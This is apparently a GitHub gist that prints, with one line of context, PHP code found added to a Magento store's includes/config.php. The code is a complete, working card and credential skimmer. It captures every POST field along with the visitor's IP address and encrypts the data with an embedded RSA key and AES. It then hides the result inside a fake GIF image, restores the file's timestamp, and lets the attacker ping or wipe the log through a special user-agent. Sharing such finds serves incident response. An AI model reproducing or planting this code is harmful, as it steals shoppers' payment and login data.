Create a gist now

Instantly share code, notes, and snippets.

The following was added to the magento includes/config.php file
<?PHP
$y0 = './skin/adminhtml/default/default/images/cancel_icon_bg.gif';
$m1 = '1355773528';
$k2 = 'pccbe60c';
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
if (isset($_GET[$k2])) {
$m1 = file_exists($y0)
? @filemtime($y0)
: $m1;
@file_put_contents($y0, '');
@touch($y0, $m1, $m1);
echo 'clean ok';
} else {
echo 'Pong';
}
exit;
}if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$i4 = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$i4 = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$i4 = @$_SERVER['REMOTE_ADDR'];
}if (isset($_POST) && sizeof($_POST)) {
$a5 = '';
foreach ($_POST as $h6 => $n7) {
if (is_array($n7)) {
foreach ($n7 as $f8 => $l9) {
if (is_array($l9)) {
foreach ($l9 as $l10 => $v11) {
if (is_array($v11)) {
;
} else {
$a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11;
}
}
} else {
$a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9;
}
}
} else {
$a5 .= ':' . $h6 . '=' . $n7;
}
}
$a5 = $i4 . $a5;
} else {
$a5 = null;
}if ($a5) {
$t12 = false;
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists(
'openssl_encrypt'
)
) {
$t12 = true;
} elseif (function_exists('dl')) {
$n13 = strtolower(substr(php_uname(), 0, 3));
$d14 = 'php_openssl.' . ($n13 == 'win'
? 'dll'
: 'so');
@dl($d14);
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists(
'openssl_encrypt'
)
) {
$t12 = true;
}
}
if ($t12) {
$t15 = @openssl_get_publickey($k3);
$q16 = 128;
$t17 = '';
$h18 = md5(md5(microtime()) . rand());
$e19 = $h18;
while ($e19) {
$f20 = substr($e19, 0, $q16);
$e19 = substr($e19, $q16);
@openssl_public_encrypt($f20, $h21, $t15);
$t17 .= $h21;
}
$t22 = @openssl_encrypt($a5, 'aes128', $h18);
@openssl_free_key($t15);
$a5 = $t17 . ':::SEP:::' . $t22;
}
$m1 = file_exists($y0)
? @filemtime($y0)
: $m1;
@file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND);
@touch($y0, $m1, $m1);
}?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment